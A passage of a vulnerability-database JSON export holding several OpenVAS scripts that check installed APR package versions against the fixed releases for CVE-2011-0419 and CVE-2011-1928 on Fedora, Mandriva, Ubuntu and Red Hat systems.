11:17:05 +0530 (Wed, 07 Mar 2012)\");\n script_cve_id(\"CVE-2012-0840\", \"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-1656\");\n script_name(\"Fedora Update for apr FEDORA-2012-1656\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.6~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:54", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-05-23T00:00:00", "type": "openvas", "title": "Mandriva Update for apr MDVSA-2011:095 (apr)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831404", "href": "http://plugins.openvas.org/nasl.php?oid=831404", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apr MDVSA-2011:095 (apr)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the fix for CVE-2011-0419 under certain\n conditions could cause a denial-of-service (DoS) attack in APR\n (CVE-2011-1928).\n\n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\n \n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apr on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-05/msg00019.php\");\n script_id(831404);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-23 16:55:31 +0200 (Mon, 23 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2011:095\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Mandriva Update for apr MDVSA-2011:095 (apr)\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.3~2.3mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.3~2.3mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.3~2.3mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.3~2.3mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.3~2.3mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.4.2~1.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.4.2~1.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.2~1.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.4.2~1.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.4.2~1.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.3~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.3~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.3~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.3~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.3~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:30", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-06-03T00:00:00", "type": "openvas", "title": "Mandriva Update for apr MDVSA-2011:095-1 (apr)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831409", "href": "http://plugins.openvas.org/nasl.php?oid=831409", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apr MDVSA-2011:095-1 (apr)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the fix for CVE-2011-0419 under certain\n conditions could cause a denial-of-service (DoS) attack in APR\n (CVE-2011-1928).\n\n Packages for 2010.0 are provided as of the Extended Maintenance\n Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\n \n The updated packages have been patched to correct this issue.\n \n Update:\n \n Packages for Mandriva Linux 2010.0 were missing with the MDVSA-2011:095\n advisory.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apr on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-05/msg00021.php\");\n script_id(831409);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2011:095-1\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Mandriva Update for apr MDVSA-2011:095-1 (apr)\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.9~1.2mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.9~1.2mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.9~1.2mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.9~1.2mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.9~1.2mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:26:46", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1134-1", "cvss3": {}, "published": "2011-06-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for apr USN-1134-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840667", "href": "http://plugins.openvas.org/nasl.php?oid=840667", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1134_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for apr USN-1134-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Maksymilian Arciemowicz reported that a flaw in the fnmatch()\n implementation in the Apache Portable Runtime (APR) library could allow\n an attacker to cause a denial of service. This can be demonstrated\n in a remote denial of service attack against mod_autoindex in the\n Apache web server. (CVE-2011-0419)\n\n Is was discovered that the fix for CVE-2011-0419 introduced a different\n flaw in the fnmatch() implementation that could also result in a\n denial of service. (CVE-2011-1928)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1134-1\";\ntag_affected = \"apr on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 6.06 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1134-1/\");\n script_id(840667);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"USN\", value: \"1134-1\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Ubuntu Update for apr USN-1134-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.3.8-1ubuntu0.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapr0\", ver:\"2.0.55-4ubuntu2.13\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.2.11-1ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.2-7ubuntu2.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.2-3ubuntu1.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:42", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1134-1", "cvss3": {}, "published": "2011-06-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for apr USN-1134-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840667", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840667", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1134_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for apr USN-1134-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1134-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840667\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"USN\", value:\"1134-1\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Ubuntu Update for apr USN-1134-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|6\\.06 LTS|8\\.04 LTS|11\\.04|10\\.10)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1134-1\");\n script_tag(name:\"affected\", value:\"apr on Ubuntu 11.04,\n Ubuntu 10.10,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS,\n Ubuntu 6.06 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Maksymilian Arciemowicz reported that a flaw in the fnmatch()\n implementation in the Apache Portable Runtime (APR) library could allow\n an attacker to cause a denial of service. This can be demonstrated\n in a remote denial of service attack against mod_autoindex in the\n Apache web server. (CVE-2011-0419)\n\n Is was discovered that the fix for CVE-2011-0419 introduced a different\n flaw in the fnmatch() implementation that could also result in a\n denial of service. (CVE-2011-1928)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.3.8-1ubuntu0.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapr0\", ver:\"2.0.55-4ubuntu2.13\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.2.11-1ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.2-7ubuntu2.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.2-3ubuntu1.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-27T10:55:05", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-06-06T00:00:00", "type": "openvas", "title": "RedHat Update for apr RHSA-2011:0844-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:870435", "href": "http://plugins.openvas.org/nasl.php?oid=870435", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for apr RHSA-2011:0844-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\n infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\n matching flag was used. A remote attacker could possibly use this flaw to\n cause a denial of service on an application using the apr_fnmatch()\n function. (CVE-2011-1928)\n \n Note: This problem affected httpd configurations using the "Location"\n directive with wildcard URLs. The denial of service could have been\n triggered during normal operation; it did not specifically require a\n malicious HTTP request.\n \n This update also addresses additional problems introduced by the rewrite of\n the apr_fnmatch() function, which was necessary to address the\n CVE-2011-0419 flaw.\n \n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\";\n\ntag_affected = \"apr on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-May/msg00035.html\");\n script_id(870435);\n script_version(\"$Revision: 6685 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:44:46 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-06 16:56:27 +0200 (Mon, 06 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"RHSA\", value: \"2011:0844-01\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_name(\"RedHat Update for apr RHSA-2011:0844-01\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-debuginfo\", rpm:\"apr-debuginfo~1.2.7~11.el5_6.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-debuginfo\", rpm:\"apr-debuginfo~0.9.4~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-05-23T00:00:00", "type": "openvas", "title": "Mandriva Update for apr MDVSA-2011:095 (apr)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": 